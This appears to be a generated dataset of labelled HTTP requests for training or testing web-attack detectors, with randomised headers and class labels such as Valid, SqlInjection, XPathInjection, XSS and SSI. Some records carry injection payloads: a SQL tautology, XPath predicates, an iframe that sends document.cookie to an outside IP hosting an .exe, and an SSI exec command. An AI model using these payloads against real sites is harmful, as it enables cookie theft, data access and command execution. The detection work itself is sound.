Warning: 451 www.po0to.tiff "IpT6h0ONe0T" "Sun, 10 May 09 06:25:33 GMT"
X-Forwarded-For: 61.41.0.191
X-Serial-Number: 046539438868930
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11602
Start - Id: 41633
class: SqlInjection
GET /sTZ7OCGO3ci4/i9UZN6892yISxEzkdO/panb/etTeRcBigeEisoeuf/s0LwrFwA945fy8o90/udeEy0uoEassiHrs/latstfryulcDie8c/H0dI/lsqhreeeOlecnlwe7o/ewNBv3/usxgKO7y.exe?aftyo=dns&rctamam=14VD31XzuH&e5emd=il&xhRKhomejXWwxA=tnheMiaao&3wTZal=fnruneheaiad&ot=stdincshutdown%7Cig+to%27HxrU&qLhonc9ny=iy&OtkhsznthUkbEe=OR+++++80737%3D80737&ue7gaSe7o77=56638270&UihaordseqnEnt=sU.S0MA&7It3=b0%27islLn%3Bzmtelnetqa%7Eag%2Fes&Odcvio74tkpp=9nun3&xU9e6nurto=lbw HTTP/1.1
Host: www.icuhh3u.ch
Connection: srcndzS
Accept: video/*, video/quicktime, video/mpeg;q=0.5
Accept-Charset: windows-1250, windows-1253, windows-1257
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale=12
Client-ip: 228.176.17.121
Cookie: zuncLSi5A-=91519;WgVDTRMvbscriptzsh=wZuqX;cn5Igtsyhavon=m;h2fsns=dc4msosnpobinyn:;7u=ramrueyea~;iEtnetf=formaeeaouue
Cookie2: $Version="5"
Date: Sun, 26 Oct 08 18:15:25 GMT
ETag: "-cn@c9fe6TG-hI_N3z@F"
Expect: dSei2edr=aNexTn
From: xrtw@gme1s0.it
If-Modified-Since: Tue, 18 Nov 08 15:47:04 GMT
If-Unmodified-Since: Fri, 04 Nov 05 17:29:12 GMT
If-Match: "Dv-.r08jh0juv3vdy"
If-None-Match: *
If-Range: Fri, 22 May 09 14:04:44 UTC
Max-Forwards: 543
MIME-Version: 5.2
Pragma: lte8urmw='oc7eNria'
Proxy-Authorization: NTLM bG5sc2NhT05hdHJyZnVhRWljaWVub3B4eThwc2hUaWhocmgxb2FnYnRiMXo1dw==
Authorization: NTLM ZWhyUGlnb2ExYWw0Y3dpZWNudHhlZGNlbm5JYnJpMWRoNHA=
Range: 53962-110288
Referer: /nk0he/uT7f9Sh.tiff
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.6 (Windows; U; Windows NT 7.2; Is-th; rv:5.9.6) Gecko/06461087
UA-CPU: Sparc
UA-Disp: 041,9154,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 064x464
Via: 7.1 37.150.156.240, aayE/0.2 99.81.231.24:7227, 9.6 80.152.60.92
Transfer-Encoding: dznn; abnmIl=swhT
Upgrade: ncT/8.9, 9ri4/6.4
Warning: 971 www.l4ihl.css "jglskraM3styhIle" "Mon, 26 Jan 09 22:24:50 GMT"
X-Forwarded-For: 239.30.161.125
X-Serial-Number: 215683669428
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41633
Start - Id: 49772
class: XPathInjection
GET /includeUCXtelnet7fK8SJmailP/ooTXO7QbCd8e.K@P__Xh/r3INKurQKVl/siuSnnttelEa/dtmalthkF4tdEi6ct5ae.mdb?gsxerpssn=n&loggQ@andP-=89twhereve4ftelnet9usexechavingbs&sioa=httpsmeqshutdowneecLh&sock_streammRlyWFq_E=%28i++++%3C++++count%28zjMl%2Fchild%3A%3Atext%28%29%29+++and++++j+%3C+count%28xY%2Fchild%3A%3Acomment%28%29%29+and++k++++%3C+count%28rzo6%2Fchild%3A%3A*%29++++%29&GEdhsX=fNuCNXhxw&et90qio7=u HTTP/1.1
Host: 113.146.50.231:794
Connection: hcli
Accept: */*
Accept-Charset: windows-1250, windows-1255
Accept-Encoding: deflate;q=0.6, deflate;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 253.1.218.202
Cookie: fGkt=gAecTa3i6rinzCsee;e9ncndttswauw8c=fromtup\ ;odoiti=opentseae0Tctsoljr4lt
Cookie2: $Version="2"
Date: Mon, 16 Jan 06 04:55:54 UTC
ETag: W/"KnKCfoDimSyNjwBe9@oK"
Expect: 100-continue
From: pohawiI@9f0Ofa.ch
If-Modified-Since: Thu, 19 Mar 09 04:49:38 CET
If-Unmodified-Since: Sun, 09 Oct 05 18:10:36 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 6.9
Pragma: ssnf='m1'
Proxy-Authorization: Digest nonce
Authorization: oehb ranln=fcmedrne
Range: 14795-998802,-1811,-6511
Referer: /soaan0o.rar
TE: trailers,deflate,trailers
Trailer: Connection
User-Agent: pntmten (jEWlU@1V)
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3095x7377
Via: 4.7 www.9ape.gif
Transfer-Encoding: iamw
Upgrade: sEr/5.8, wolisa/6.8
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 242.32.16.78
X-Serial-Number: 9273829516846529
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49772
Start - Id: 11661
class: Valid
GET /n-.shtml?fzsw0semebmrceI=e2iADX&uiz0=koex3hxFv&mrrxpstdiet2f=eed&4acceptHgTNiEMLE=kQzbe&de=6819&nytKRtoreua=43890488&0fsrTIsetrnpre=n9i5qHeo%2F%2Fnnu HTTP/1.0
Host: www.nzso.net
Connection: close
Accept: audio/*;q=0.7, audio/x-wav, video/quicktime
Accept-Charset: iso-8859-7;q=0.9
Accept-Encoding: compress, deflate;q=0.8
Accept-Language: oiA6-ote, lN6oe0m-oaypyjdu
Cache-Control: min-fresh=82571
Client-ip: 38.112.56.235
Cookie: rtRer=2;manwho5b=sobrfdisg;raws=89941726;l1dI=65;cmlehtess=< ;sq=y5eenx460dorh
Cookie2: $Version="66"
Date: Mon, 28 Jun 04 22:13:04 CET
ETag: "sqYjr0uylAea_g5"
Expect: eThAaoa
From: ufw0isn@wEgaa4o.uk
If-Modified-Since: Sun, 18 Jan 09 14:33:22 UTC
If-Unmodified-Since: Sun, 19 Sep 04 19:57:42 GMT
If-Match: "AzWFxez1kpv7E_@"
If-None-Match: *
If-Range: Thu, 10 Sep 09 14:43:15 GMT
Max-Forwards: 9
MIME-Version: 2.8
Pragma: trgolhd='eu1dB'
Proxy-Authorization: Basic dXRybmsyOm5ldGljdA==
Authorization: 8blen Uiroom=eiiho
Range: 93-2855,61-3
Referer: /suzif45o.asmx
TE: chunked;q=0.0,deflate;q=0.6,trailers
Trailer: Via
User-Agent: Mozilla/3.2 (compatible; Konqueror/0.9; Solaris; hs6resQnT; dbtn)
UA-CPU: PowerPC
UA-Disp: 4467,233,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 178x213
Via: FTP/5.7 140.143.127.141, HTTP/2.4 www.otyedi.jpeg, 9.3 www.edybra.shtml
Transfer-Encoding: identity
Upgrade: iocd/6.9, Dmvo/9.9, oft/0.7, lu4Hrr/7.4
Warning: 062 147.28.128.111 "yeya0Tla6en" 
X-Forwarded-For: 106.177.217.179
X-Serial-Number: 7331702860784
----: -------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 11661
Start - Id: 28991
class: Valid
GET /execinclude_zAUo6/gjti9e/96K@V@-adbCBchrkzB/cs/NtraRlly9ngfe/s6C.vHRw4i2tO2b1h/rpi/uihsroosmueuc9idWizv.html?O3Tl=ia7ntr&e55r7tgs=ijo2doTew&wcowcfoitrxiN=a5qXgF2UT&ftcaeaiodstst5t=ou&ttempxxd=lrstaEsp&athsehgessHm9=xterm%5D&vsPWOG3TduR=5&aueqqhseHeer=sJa HTTP/1.1
Host: www.Iutb.ch
Connection: uyltuWt
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.2, gzip
Accept-Language: *;q=0.4
Cache-Control: max-age=139
Client-ip: 40.93.233.194
Cookie: eehnL=rIzN4lOFA;lyBJpsc=7220582;GVVbky=ogebd0a;e4hjbdso=be?pG=;tgeemlspyt=iome
Cookie2: $Version="232"
Date: Wed, 05 Dec 07 19:34:52 GMT
ETag: "6W6lizwmf3Sl4Tos"
Expect: na2f=odrapD
From: wtctrua@rxqmyrhe.be
If-Modified-Since: Mon, 13 Nov 06 16:33:14 UTC
If-Unmodified-Since: Thu, 15 Feb 07 10:44:42 CET
If-Match: *
If-None-Match: "0hYN.PqbAzIHZ8FsFX"
If-Range: Fri, 22 Jan 10 04:12:31 GMT
Max-Forwards: 1714
MIME-Version: 1.3
Pragma: tLTv89t=eKe5p
Proxy-Authorization: Digest qop=auth
Authorization: Digest cnonce="crce"
Range: -48236,695-,-4
Referer: /rgiofe5d/7ge3/slhph/mwic.rar
TE: chunked;q=0.5,gzip,chunked;q=0.0
Trailer: If-Range
User-Agent: Mozilla/9.3 (compatible; Konqueror/4.3; Win98; neer0O; cImecf)
UA-CPU: MIPS
UA-Disp: 011,231,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 907x891
Via: FTP/9.0 4.53.207.136
Transfer-Encoding: deflate
Upgrade: ou1/8.3
Warning: 848 www.1zbi.js "tteneag" 
X-Forwarded-For: 91.46.165.1
X-Serial-Number: 055751373307057
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 28991
Start - Id: 47509
class: XSS
GET /nodeEyxjMpszdE2uPD/oT/LHZqhDscriptcatAVgJs9.jpeg?hmsaedmDldsn=%3Ciframe+src+%3D+++%22vbscript%3A%5Bwindow.open%28%27http%3A%2F%2F167.213.38.106%2Farre.exe%27%2Bdocument.cookie%29%3B%5D++%22%3E&S7ZyCmetai=cssdrop&A9seNhaux=oEttnefkre&et=ra%2Fesal&Tfftdqa7r3BXi=nwM&qetonaR0=84345&cOTictsxhT=r&kh=ohc%5CseE&eb8t=qevraeoiredtar&ZKJIUbR=deee7elstcN8shrnulle+ HTTP/1.0
Host: www.oimtr2s.fr
Connection: tbAm
Accept: */*
Accept-Charset: iso-8859-2;q=0.8, iso-8859-5;q=0.5, iso-8859-8-i;q=0.7, iso-8859-1
Accept-Encoding: *
Accept-Language: *
Cache-Control: Sroeiatr='h9rqpf'
Client-ip: 83.78.121.7
Cookie: wbasrnTjea=nqo;oRoostsuasrfo=rcpawhere;jel3yamy8t3n=t deletehe2e'tilrjkwhere;teC0ea3EnS=eetodeood0tixaon;nrnwfltt6st=968;hOti8e2sneida=0
Cookie2: $Version="817"
Date: Tue, 16 Feb 10 18:58:35 UTC
ETag: W/"..eEOtCkNhyhXa53H"
Expect: 100-continue
From: eudn2a@se5tse.com
If-Modified-Since: Thu, 13 Apr 06 15:53:13 CET
If-Unmodified-Since: Sun, 23 Jan 05 04:10:37 GMT
If-Match: "GFAfeUfcH9WAiYq"
If-None-Match: *
If-Range: Thu, 14 Jun 07 10:29:37 UTC
Max-Forwards: 0
MIME-Version: 9.4
Pragma: lRetr='hhobli'
Proxy-Authorization: Digest nonce
Authorization: NTLM b29ycWxlc3M2U0lnNUk2SXdOcmNpYWVOdGZ0YWFlbW9mYWtpd2VlYWlybzdmZGc=
Range: -582231
Referer: http://www.iteSs.st/Auwuve7/Odri/wdi5i.gz
TE: gzip;q=0.1
Trailer: Authorization
User-Agent: edmqu/9.7.5
UA-CPU: PowerPC
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7841x155
Via: HTTP/5.9 182.75.75.3, 3.0 5.254.242.124
Transfer-Encoding: compress
Upgrade: atsa/8.3
Warning: 065 134.123.203.94 "ntssttrkginowelli" 
X-Forwarded-For: 128.172.113.199
X-Serial-Number: 870651819
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47509
Start - Id: 19035
class: Valid
GET /Lscriptusr7GhttpJpLDXfhtacces0/o7XlhntNt9HGw/dLkBV7vR_3R_jtG_joa3/o9Ce-74r@4dvfdCZJoT/aNeTs.ZiqvrtUDSn6l/So/yXB@weXI-7eZC/wAVu8n3nh/ttlrnisgut/amS7_mm/J9stdinXt0/n4RptfETfy-3s_m.php4?eeo2r=%25r+hr&%ujH_J4b=tix+theE&hhx=yy54hptg&isnetase5ea=643&lZ-D_8=tR3+SormGy&Snph-HhttphNG4=rtta&ausox=ts9hhia+6%28h%5Bscenc8osn&Rir=atMNwndweOeemrukIG&mOcQ0HA=285174 HTTP/1.0
Host: 108.135.31.87
Connection: oedho7hn
Accept: */*;q=0.7
Accept-Charset: windows-1258
Accept-Encoding: 
Accept-Language: lkneha-0hU;q=0.3, onoah-pmioil;q=0.4, echlhci-aiEo5tr;q=0.4, ne-yeTe
Cache-Control: max-age=70
Client-ip: 81.216.134.74
Cookie: M3IJMm=tx;hyrhdch=9704065;aatsv=272869
Cookie2: $Version="578"
Date: Thu, 16 Nov 06 02:32:19 UTC
ETag: "bIU1Kb-eMwWtUQP8MrHT"
Expect: 100-continue
From: aattwww@nt6s.org
If-Modified-Since: Wed, 16 Mar 05 01:04:12 UTC
If-Unmodified-Since: Sun, 04 Apr 10 04:47:16 CET
If-Match: *
If-None-Match: "WJoMnmsTGqnKM.UvIZf"
If-Range: "K141f07cJVU1jrf"
Max-Forwards: 0467
MIME-Version: 0.1
Pragma: ic='rtoipc'
Proxy-Authorization: NTLM ZWxlbnJhbjRoZmdvcndzYm9yNGRuYUl1dXR3aDdlMWlwdGh0ZWE=
Authorization: NTLM a2VnNXRvc2VhZmV0aXdkdHJldGFlclZoYXRpT2FEYXkzZW50aWU=
Range: 54-5644,-3175
Referer: http://www.2lttlfec.uk/ekdua/vapmts6n.php
TE: deflate,gzip;q=0.2
Trailer: If-Match
User-Agent: Mozilla/8.6 (Windows; U; WinNT 0.0; ma-5s; rv:2.2.6) Gecko/12055776
UA-CPU: MIPS
UA-Disp: 0090,6140,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 619x909
Via: HTTP/2.4 3.15.198.41:44, FTP/2.4 249.130.255.150, 5.4 www.oUeeji.gif
Transfer-Encoding: compress
Upgrade: e60/6.4, Dojen/4.5, 8latt/8.3
Warning: 116 170.222.10.170:68 "t5ueaspsrUFecey" "Tue, 17 Nov 09 03:08:22 GMT"
X-Forwarded-For: 144.31.247.88
X-Serial-Number: 27260320301
----: ---------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 19035
Start - Id: 5516
class: Valid
POST /it8hiBu3hainthkogh/sYRrk/txaNaeNdeksuEe/s8A-@hDDer/enetpsn4vxgsnnt/6hzJyo4yPnKrTA@/dmhz/tiKmhidmtkSfrHt/passthrupKNXosHbKj8F4.css? HTTP/1.1
Content-Length: 194
Content-Language: azcD,aneJ,m
Content-Encoding: compress
Content-Location: http://www.oCmEieue.it/eh2tbo.mdb
Content-MD5: ZW1TaG5lbjdkZXRuZUVjbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 12 Apr 08 10:02:39 GMT
Last-Modified: Sun, 20 Aug 06 11:28:08 GMT
Host: www.naios.gov
Connection: 42ssns
Accept: */*
Accept-Charset: gb2312;q=0.2, windows-1254, windows-1253;q=0.8, x-mac-japanese;q=0.8, iso-8859-5
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 19.114.67.195
Cookie: oEr=sqetc;1oirssash=am3qU;nd3ezrsp6augheH=ynrudoosmyaNet;n-Fftp=5;axnyeqstBlNt7=2ebi
Cookie2: $Version="30"
Date: Sat, 26 Dec 09 09:24:32 GMT
ETag: "g0@iIvnM5Zj5r1.0kD"
Expect: 100-continue
From: RlTg@lDaee.org
If-Modified-Since: Sun, 21 Mar 04 10:36:43 GMT
If-Unmodified-Since: Fri, 16 Oct 09 04:35:41 GMT
If-Match: *
If-None-Match: "A1l.GE1y3g7oBNNNfc"
If-Range: Thu, 06 Sep 07 14:16:28 UTC
Max-Forwards: 2
MIME-Version: 7.0
Pragma: u=glfbe
Proxy-Authorization: Digest opaque="hnr4higt"
Authorization: Basic NG5ueWk6bk5SaG50THQ=
Range: 4-,7992-3492,625-
Referer: /n0ieier/dxatd/ilhcu/resl.nsf
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/0.2 (compatible; Konqueror/1.7; Unix; 5siuofn8d; fCix)
UA-CPU: x86
UA-Disp: 295,212,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 161x6409
Via: rzuu5u/6.9 www.udoa.htm, HTTP/9.2 88.122.41.97:612
Transfer-Encoding: identity
Upgrade: aws/0.6
Warning: 321 www.hrctezid.js "o2Tbr6utate" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 342559338014903
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Hswet=objectb&edsii1=sJJvxqu_&lfMe7e=33812&fqh7=r89erC&eidioaaehe1zbio=e&BVd@In=Ohm?saccept&oMDhatbsniuq=eeryce4woieg9IaZg&qeaiosmdzinaw6i=e71Et1hhbeWdtbe&eiOhseictch4=ecmdqbsaaQh&Eaeaq=oftpme

End - Id: 5516
Start - Id: 33716
class: Valid
POST /oJkedkNU/jzZpjTbodygScBNcate.jsp? HTTP/1.0
Content-Length: 143
Content-Language: 4nt7e,wsN5eV
Content-Encoding: compress
Content-Location: http://www.6uiell1e.biz/cp2ehg.php4
Content-MD5: ZWVvRHIxbzJtdDZyM0lkcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Nov 09 03:40:59 CET
Last-Modified: Sun, 09 Oct 05 21:12:54 UTC
Host: www.nbgg2S.it
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: utf-7, iso-8859-2
Accept-Encoding: *
Accept-Language: *
Cache-Control: eknsW='mo'
Client-ip: 178.20.130.175
Cookie: tt=aSi;sh_l.=179
Cookie2: $Version="4"
Date: Tue, 16 Jan 07 18:10:19 CET
ETag: "qOYUVcgl69BJHol6"
Expect: oM4iit=9tedi
From: eSwnhmt9@baaeh4uleA.net
If-Modified-Since: Sun, 22 Nov 09 23:56:57 GMT
If-Unmodified-Since: Tue, 20 Jun 06 07:29:27 CET
If-Match: *
If-None-Match: *
If-Range: "UsD8dWGdf8TtOoe-"
Max-Forwards: 70
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ubkliie
Authorization: NTLM ZWJqZ3Bxc2RwaWVxZXJya28zRWVtcTFnaWV0NHJlaGR3bmNuMWF4
Range: 521419-715172,4927-26503,-3630
Referer: /mmue/viyT2q/tr1inOeg/Roee/sars.aspx
TE: trailers
Trailer: If-Modified-Since
User-Agent: vCT-jknwS http://www.tfptRhez.gov
UA-CPU: x86
UA-Disp: 9133,083,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 520x205
Via: 2.1 96.189.240.111, 3.0 www.sn7uhb.gif, 6.1 www.yesa5A.gif:78
Transfer-Encoding: compress
Upgrade: ricefc/1.7, det/8.3, 4ue/4.8
Warning: 169 www.deqz.htm:7727 "bhneliecthdnon3n6p" 
X-Forwarded-For: 145.242.152.101
X-Serial-Number: 695598853636
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wphnwiisI=dfFeuY88f3b&iahmrwhodh= mjteseo4oi&NG27xUftp=rwinnt&Cg7Mh122=satetivhte1hurs&eNdeubieLaa=Waepenssak&52th=D2nwEhsgay&hwseto1tertaee=21

End - Id: 33716
Start - Id: 31452
class: Valid
GET /wyul/ilhTY.Pc.php4?uihn5esmtUnts=ptXR&ueoeId9The07ll=sUswBFFUqM&vsprsIoo=7220&S0AH=8015176767&ii=578215&iaiotsretep6it=pbL2anotey0&ezaese3LakLM=q8to&uo=rp%5C%3Dt%28EoSlti%29rsf&dlirDhD=elib&ooieeeoe=379&frca4rgvedrhge=abStnehrlit&I9Z3fBK0_window.opensC=sDHu%407tOZ&wssghat=028161 HTTP/1.0
Host: 214.254.238.251
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.3, compress, deflate
Accept-Language: roNhhunt-EvebsEn;q=0.7, drq-lf, Rrt-tVetEtji, d7ifiamz-is
Cache-Control: max-age=44
Client-ip: 251.240.231.143
Cookie: UahesEea=ko17'$Ibe;r7atrHesoc=nle;rruat=lXNsicXCP;4NdK1NSr=02
Cookie2: $Version="986"
Date: Sat, 06 Aug 05 15:57:11 CET
ETag: "l_xvqvivFPH5kQ2Tujo"
Expect: ribt4ui=elerna6a;up7ar5i=Ltenaeu
From: vconid@sswn.net
If-Modified-Since: Fri, 11 Feb 05 19:52:17 CET
If-Unmodified-Since: Fri, 05 Aug 05 06:33:12 GMT
If-Match: "AxcVevcDkmkamvfIr3C6"
If-None-Match: *
If-Range: Wed, 26 Nov 08 12:02:39 CET
Max-Forwards: 5
MIME-Version: 2.0
Pragma: Mvoe=lnOetbhr
Proxy-Authorization: NTLM ZWV4cmhqdGFhcm1wcFNjNnVnZWxpeW5lYTlobHJ4Q0hkRXQ=
Authorization: NTLM bmF3bmlhcWVlZXEyYWhydWdEcjhlbjIzb2FUeDdyZWU=
Range: 8-388473,6-
Referer: /oa1J/Wa2lmbss/aurs.msf
TE: gzip,gzip;q=0.8,trailers
Trailer: Host
User-Agent: Mozilla/2.9 (Machintosh; U; Mac OS X 0.0; cs-am; rv:6.1.9) Gecko/31107436
UA-CPU: MIPS
UA-Disp: 4201,0533,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 389x351
Via: HTTP/4.8 www.dDeen.html:3000, 4.6 90.175.201.188
Transfer-Encoding: identity
Upgrade: nesh/9.6, Olad57/7.3, mht/9.0, dthE/6.5, Nwteoi/0.9
Warning: 765 24.36.202.0 "ajeMEawyotisp" 
X-Forwarded-For: 187.213.56.17
X-Serial-Number: 1337403720563308
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31452
Start - Id: 48650
class: XPathInjection
PUT /eedKshaseae744lae/t5ollgoerxttbrdr/3MvJ0@Jx50UdBCWHl/a3Xr07Z@c7D/sNX9JCSS8uKAYb4/inbporirfMarvhentf/aytDcoqdumhMliwigs/Ug7cpiDb/iEupdate5H-vxgQ@@D/eNO@MXca_H.cEN.php? HTTP/1.0
Content-Length: 227
Content-Language: sea9i,d
Content-Encoding: compress
Content-Location: http://www.hy7t.org/t8tacl/uppd/tiie/a3ersi.gif
Content-MD5: bGptbXNPaWFzd2RkN3Bvbg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Sep 09 09:03:32 GMT
Last-Modified: Sun, 07 Mar 10 11:17:41 GMT
Host: 191.225.79.255
Connection: 8yseDl
Accept: text/plain, audio/*, application/*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.3
Accept-Language: aMrthEl-hl4jy;q=0.2
Cache-Control: only-if-cached
Client-ip: 43.212.151.158
Cookie: efubmcaoet=fs;rcnInde8auyTd=56t
Cookie2: $Version="55"
Date: Tue, 21 Sep 04 20:28:07 UTC
ETag: "bQtfcZLDIz1no2ICu5"
Expect: shdr
From: eta3@rewxn.biz
If-Modified-Since: Tue, 12 Feb 08 09:14:37 UTC
If-Unmodified-Since: Sun, 25 Feb 07 20:18:44 CET
If-Match: "khpo7Gi5AlpzPwYH"
If-None-Match: "fA8cmb.zXWJITyEO-nKi"
If-Range: Sun, 05 Apr 09 10:23:32 GMT
Max-Forwards: 51
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM cXRhYXRucm5EaTR0cGR2b2ZubGZlYXR5c3Vob3R0ZWlzZVJvbHMydA==
Authorization: Digest nc=FF568b5A
Range: -046912,8351-4,007308-22
Referer: http://tCuodele.de/aobT/ogffoe4/ypRln/aaeIdi/nwkae.gif
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.2 (X11; U; Open BSD i386 1.1; e9-ga; rv:5.5.1) Gecko/43821144
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: FTP/9.8 171.243.31.230
Transfer-Encoding: compress
Upgrade: itU/7.7, Hiees/3.1, oiur/4.5, drrff/2.0, r9e5nh/3.5
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 36007
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eprks=pdRHhnn6l&5weTvobsemafa=e&0touetou56Ekxnr=Uo7Zod9afeo8di&aO6tmpc44=otr&issEnet9Er=d5eheohyn3o'c%ssaz&uuun=eya1&issdoeofLo=cghxwdy' or path/child::node()[position()=N]  or    'Jdo3itq' = '

End - Id: 48650
Start - Id: 49693
class: XPathInjection
GET /2imFdeamnrtulce9ohtr/ot8rehoh6s5p/lsdfhrnaoenfzb/cqBrMj.88p6S/1v/netcatEm/aXFxzqdBpcL/a2a/6d.pl?fai=e3atMV&dd=nTncnyeituuheOr&6Rrnck6iAOl=at&OhtpassBbody=qh5wHR&Tpoc=o1dobrtetM3at&SpbiiaMssIoti=cklrsla&ldts=ntlal3telnetbrugAf&oer=%29o&zdudew@body2=79s+to%27rroN&asn=6&ne7=sAfIefntamoatae4yt&0y8wtTqeup=1915++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++2308%3D&bp4Aioxqleo=amY&gteIocttherre=ttEqci6ei&anpa=4777479 HTTP/1.0
Host: 189.62.213.179
Connection: keep-alive
Accept: video/mpeg, audio/*;q=0.9, application/postscript
Accept-Charset: x-mac-greek
Accept-Encoding: gzip;q=0.1
Accept-Language: pgiE0qj-r4rciT, eteLntHl-px, cue7de-Vro;q=0.2, iirsf2l-ma0sE, eccAfiu-oretNkTt;q=0.8
Cache-Control: only-if-cached
Client-ip: 108.128.7.126
Cookie: ldeq0h=ysLA6bB3CnA;uw=sN2wA;q6ejseedtq10s=3594552493;oJniD4VuH=slhasIansmrRted1
Cookie2: $Version="5"
Date: Thu, 01 Apr 10 15:07:21 GMT
ETag: W/"rxcndMh1TvLBsYH"
Expect: Aahhoh
From: tmHtei@9Eaetn4.de
If-Modified-Since: Tue, 27 Apr 04 21:14:11 CET
If-Unmodified-Since: Wed, 13 Feb 08 08:13:42 GMT
If-Match: *
If-None-Match: *
If-Range: "nuu7cjCe855KxP@P.N"
Max-Forwards: 08
MIME-Version: 7.7
Pragma: k1ehsu1=d
Proxy-Authorization: NTLM b2RuZWV0bGVubm5nb2huU3diYWZibW9uc3BlRHp2dG1jYXdiZWNsM0FlNXM=
Authorization: NTLM ZHpwRXJyZGF3cmFFbmh0bnRhU2xlbHNUdHQ4ZWVhZXVy
Range: -394122
Referer: http://wNses.com/aeae.php4
TE: trailers,chunked,trailers
Trailer: Proxy-Authorization
User-Agent: y-sqyeZ http://www.aiesiaC.it
UA-CPU: StrongARM
UA-Disp: 2722,5111,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5244x685
Via: Eesi/0.8 55.16.108.52, 4.2 www.eminhfns.htm
Transfer-Encoding: compress
Upgrade: reeei/0.0, w2wde/2.4, e58a/5.6
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49693
Start - Id: 40346
class: SSI
PUT /c9yEVt1aZcomEo/2HQQ3vlNHFAv10/6hhIsjY/dSCRAr3sp7h3um.Xm/rb5e1Ertnzyevou/v8XsVetH_ajfCA/ataawvDuiacutre/hA_gA97E/y3dtnnwaterw/seteh1os2c/W6AesedtIrx/fYfagcHeoDsaCe9c.asmx? HTTP/1.0
Content-Length: 320
Content-Language: QI,rBatte,suaasI
Content-Encoding: identity
Content-MD5: dWFlcnZpc0JndXlzdFJxOA==
Content-Type: application/x-www-form-urlencoded
Host: 247.144.185.247
Connection: 5teoltb7
Accept: application/*;q=0.7, application/*;q=0.4
Accept-Encoding: identity;q=0.1, deflate;q=0.8, gzip;q=0.5, identity
Accept-Language: <!--  #exec    cmd="c:\progra~1\p0erhVo9\up\lh.exe d:\5in7b\www.erteiles.org\ni\database.mdb  /x   exporttofoxpro"-->
Cache-Control: sii='L1tsodry'
Date: Sun, 26 Mar 06 01:01:17 GMT
If-None-Match: *
If-Range: Sun, 16 Aug 09 10:37:11 CET
Authorization: gh0zrl inaohe=ryg8si
Referer: http://6x9r.it/heCvko.gz
User-Agent: Mozilla/4.9 (compatible; MSIE 2.0; SunOS sun4u; cpll)
Via: 3.3 58.141.104.255:3

so2uue=05483415&awtadesdt=&N&tmPTfbeFet=rkthlowncnrh&PtsnhrwrrqunR=iservicese119btap &Vk7sN70FPQEF=letetmptyaganerehome&jrtAabsjRE=30406&soisnhkxE=gconnecthi:&yenormth5sh=254846&mpseanjjSh5=54&sLdAls_L=ps4~4&heaj=ehSeeritpe1rrTl&u_VojIgX1=fGdahoEfn7shiw6uy&eCeogexn=tr3&xoaiiysahin=413906&iah6tfIi0=iqhatstpscdadii

End - Id: 40346
Start - Id: 32921
class: Valid
